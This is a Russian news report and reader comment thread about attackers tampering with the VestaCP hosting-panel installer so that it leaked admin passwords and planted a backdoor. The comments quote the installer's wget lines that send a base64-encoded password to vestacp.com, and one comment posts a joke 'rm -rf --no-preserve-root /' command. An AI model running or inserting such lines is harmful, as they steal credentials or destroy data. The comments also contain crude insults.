В установочном скрипте панели управления хостингом VestaCP выявлен (https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=1...) код, выполняющий отправку параметров аутентификации для доступа к системе пользователя. В частности, в штатную систему отправки телеметрии, которая в ответ на внешний запрос осуществляет вывод названия дистрибутива, добавлены дополнительные параметры, выдающие пароль администратора и IP текущего хоста.

Индикатором утечки данных является наличие в логе запросов вида "http://vestacp.com/test/?ip=x.x.x.x". Если данная активность наблюдается, то вероятно уже недостаточно просто сменить пароль администратора. После получения параметров доступа, атакующие устанавливали бэкдор, который мог выглядеть как системный файл
/usr/bin/dhcprenew, реализующий командный сервер для участия в совершении DoS-атак и предоставляющий скрытый shell. После запуска указанный бэкдор маскируется под видом процесса "[kworker/1:1]".

В ходе начального разбора инцидента выяснилось, что код удалось изменить в результате взлома некоторых серверов инфраструктуры проекта. Взлом произведён при помощи новой уязвимости, вызванной ошибкой в API, появившейся в апрельском выпуске 0.9.8-20 (https://forum.vestacp.com/viewtopic.php?f=25&p=68895#p68895). Проблемы устранены (https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=1...) в выпуске 0.9.8-23 (https://github.com/serghey-rodin/vesta/commit/cde42691701667...). Дополнительные подробности пока не сообщаются.

URL: https://forum.vestacp.com/viewtopic.php?f=10&t=17641&start=1...
Новость: https://www.opennet.ru/opennews/art.shtml?num=49457

• Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 13:47 , 18-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,А, 14:51 , 18-Окт-18
    • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 16:26 , 18-Окт-18
      • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 16:49 , 18-Окт-18
    • Злоумышленники добавили вредоносный код в скрипт установки х...,Himik, 18:56 , 18-Окт-18
      • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 23:32 , 18-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,Ирокез, 19:58 , 18-Окт-18
    • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 08:26 , 19-Окт-18
• Злоумышленники добавили вредоносный код в скрипт установки х...,mikhailnov, 14:07 , 18-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 14:29 , 18-Окт-18
    • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 16:42 , 19-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 15:06 , 18-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,scorry, 15:47 , 18-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,th3m3, 16:59 , 18-Окт-18
    • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 18:13 , 18-Окт-18
• Злоумышленники добавили вредоносный код в скрипт установки х...,CHERTS, 14:37 , 18-Окт-18
• Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 14:39 , 18-Окт-18
• Злоумышленники добавили вредоносный код в скрипт установки х...,th3m3, 16:53 , 18-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,FedeX, 17:09 , 18-Окт-18
    • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 19:25 , 18-Окт-18
• Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 18:36 , 18-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,Борщдрайвен бигдата, 20:41 , 18-Окт-18
    • Злоумышленники добавили вредоносный код в скрипт установки х...,Типа хомячок, 23:04 , 18-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,KonstantinB, 06:26 , 19-Окт-18
    • Злоумышленники добавили вредоносный код в скрипт установки х...,нах, 10:37 , 19-Окт-18
      • Злоумышленники добавили вредоносный код в скрипт установки х...,KonstantinB, 04:03 , 20-Окт-18
        • Злоумышленники добавили вредоносный код в скрипт установки х...,пох, 10:46 , 20-Окт-18
        • Злоумышленники добавили вредоносный код в скрипт установки х...,Vitaliy Blats, 12:40 , 20-Окт-18
          • Злоумышленники добавили вредоносный код в скрипт установки х...,пох, 19:35 , 20-Окт-18
• Злоумышленники добавили вредоносный код в скрипт установки х...,odd.mean, 07:38 , 19-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 09:41 , 19-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 06:23 , 21-Окт-18
    • Злоумышленники добавили вредоносный код в скрипт установки х...,odd.mean, 08:40 , 21-Окт-18
• Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 09:44 , 19-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,Vitaliy Blats, 12:17 , 19-Окт-18
• Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 21:06 , 19-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,пох, 21:46 , 19-Окт-18
    • Злоумышленники добавили вредоносный код в скрипт установки х...,Грусть, 22:59 , 19-Окт-18
      • Злоумышленники добавили вредоносный код в скрипт установки х...,пох, 19:39 , 20-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 23:16 , 19-Окт-18
  • Злоумышленники добавили вредоносный код в скрипт установки х...,Аноним, 01:43 , 20-Окт-18
    • Злоумышленники добавили вредоносный код в скрипт установки х...,annual slayer, 06:45 , 20-Окт-18

> штатную систему отправки телеметрии

Ух. Хорошо зашли.

> которая в ответ на внешний запрос осуществляет вывод названия дистрибутива

ха-а-арошая какая телеметрия. она еще и запросы штатно принимает. вообще класс. штатную телеметрию  модернизировали до телеуправления.

А ты как собираешься без запросов спросить телеметрию, умник?

А не надо её спрашивать. Можно сделать, чтобы клиент телеметрии сам отправлял её по расписанию, скажем, раз в неделю. Без запросов с сервера.

Злоумышленники добавили вредоносный код в скрипт установки хостинг-панели VestaCP. Хотябы название статьи читали. Если сервер не отвечает на запросы, то это не сервер.

Ага, рабочая станция значит, так?
А если рабочая станция отвечает, то сервер, блин у меня оказывается ЦОД набитый серверами...

Ш10 отправляет ваши данные в микрософт говорили они.

Дурной пример заразителен. Веб-абизянки тоже хотят быть как большая компания.

Повесил на вход в админку Vesta на нестандартном порте дополнительную HTTP-авторизацию средствами nginx. Уже вторая уязвимость мимо.

Если не забывать о том, что введенные вами логин/пароль пробрасываются в весту в заголовке BasicAuth, ни разу не мимо. Их могло запросто отправить вместе с прочей "телеметрией".

> введенные вами логин/пароль пробрасываются в весту в заголовке BasicAuth, ни разу не мимо. Их могло запросто отправить вместе с прочей "телеметрией".

Наш ответ: https://hackage.haskell.org/package/sproxy2

Как это спасёт от "бэкдора в установочном скрипте"?

Безопасности удалятся 0, информирование через месяц (ветка форума eng раздела, спасибо, что после обновления, скрипт проверки отработает), fail2ban/firewall так и научили определять порты "/usr/local/vesta/bin/v-add-firewall-chain" (не дефолтный фтп). И нет, у меня всё чисто, но уже напрягает.

«поставил себе вирус. закрыл файрволлом. я хаккир.»

На что только не пойдут, лишь бы консолью не пользоваться.

Ваш комментарий огорчает молодых специалистов.

Ох и рeшето... других слов просто нет.

Давно знал что майкрософты ужасное по делают

Я давно говорил, что все эти панели - добром не кончатся. И ведь не первая новость про эту Весту. Давно отказался от этих ваших панелей и жить стало лучше и веселее, особенно когда читаю такие новости, про очередной косяк с панелями.

Не зря матери дочерей учат - "Кто не учился, те работают на панели и заразы всякой набираются".

А потому служат Нурглу и Слаанеш сразу?

статья ваша ниочем. сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили.
codename="$codename:$(echo $vpass:$servername | base64)"
wget vestacp.com/notify/?$codename -O /dev/null -q

https://github.com/serghey-rodin/vesta/commit/a3f0fa1501d424...
https://github.com/serghey-rodin/vesta/commit/ee03eff016e03c...

а взломщики скорее взяли их из лога сервера vestacp - куда они отправлялись инсталлятором

а ссылка http://vestacp.com/test/?ip=127.0.0.1 для проверки ip вашего сервера (есть ли он в логах или нет)

> сотрудники vesta сами добавили сбор пароля от admin в инсталлятор в base64, потом его удалили

Но зачем?!

'Cause they can, очевидно же.

Шикарно.

И это тот случай, когда открытые исходники не помогут: те, кто умеет их читать, не пользуются панелями, и наоборот. :-)

хинт: те кто умеет их читать, не пользуются панелями, а продают их как услугу.

Правда, вряд ли на свете много продающих хостинг на весте - коммерческие хостеры обычно используют cpanel или ispmgr (оба феерическое невменяемое гуанище с закрытым кодом, больными yблюдкaми в менеджменте и рукoжoпыми гoвнoкодерами, но ничего лучшего опенсосеры не родили)

Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет 5 это все никому, кроме пожилых сеошников, не надо.

> Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет
> 5 это все никому, кроме пожилых сеошников, не надо.

угу, нет другого интернета кроме вконтактега и мордокнижечки, и товарищ майор пророк ихний.

> Ой, не напоминайте мне об этих убожествах. Слава яйцам, в последние лет
> 5 это все никому, кроме пожилых сеошников, не надо.

Это ты так думаешь. В мире мало того что куча VPS'ок с предустановленной панелью, так еще и куча сайтов на шаред-хостинге, где так же используются эти панели.

Мы, пожилые сеошники конечно рады, что ты великий гуру можешь купить VPS'ку, задеплоить туда твою Убунтачку, поставить туда LAMP, exim с dovecot'ом, вебмылом и спамассасином, ну и само собой разумеется сгенерить DKIM'ы дабы письмецы не попадали в спам, написать скрипты добавления мыльных аккаунтов и доменов (просто если ты будешь добавлять это вручную - то ты еще фееричнее кретин чем я думал) и все это за 5 баксов - но мы НЕ ТАКИЕ, мы просто хотим сделать сайт-визитку для своей шашлычной на Вордпрессе за полчаса :))

> мы просто хотим сделать сайт-визитку для своей шашлычной на Вордпрессе за полчаса :))

на самом деле нам его уже сделал жопорукий аутсорсер, осталось выложить.
Он, конечно,предлагает хоститься на его сервере, но, поскольку он его сам настраивал, как умел, тот сервер половину времени не работает, и во всех блоклистах отметился, а еще он на нем немножечко майнит.

Хорошую вещь "CP" не назовут.

И альта-вистой тоже....

а CP/M ?

Ну разве что CP/M. Да и то...

Есть Ajenti не вижу смысла в существовании этого плохо-кода.

> Есть Ajenti не вижу смысла в существовании этого плохо-кода.

Есть %software_name1% не вижу смысла в существовании этого %software_name2%.

Fuck me

https://github.com/serghey-rodin/vesta:

```
Download the installation script:

curl -O http://vestacp.com/pub/vst-install.sh

Then run it:

bash vst-install.sh
```

прости, а то что он тебе понаустановит - ты запускать вообще не планируешь? Или предполагаешь, что баш чем-то страшнее и ужаснее php?

Вам следует настроить свой камертон на curl http://...

ой, какой ужас, злые соседи...э...какие нахрен соседи, мы что дома ставимся? Злые враги инженеры хостера...э...стоп, а им зачем, они прямо на диск могут записать... э... ну я уж прям не знаю кто - магистральные операторы в терабитах порнухи и котиков разглядели наш невинный curl и подбросили вражеский код, да?

echo "rm -rf --no-preserve-root /" | sudo bash

curl2bash™

есть уже `curl --rootme`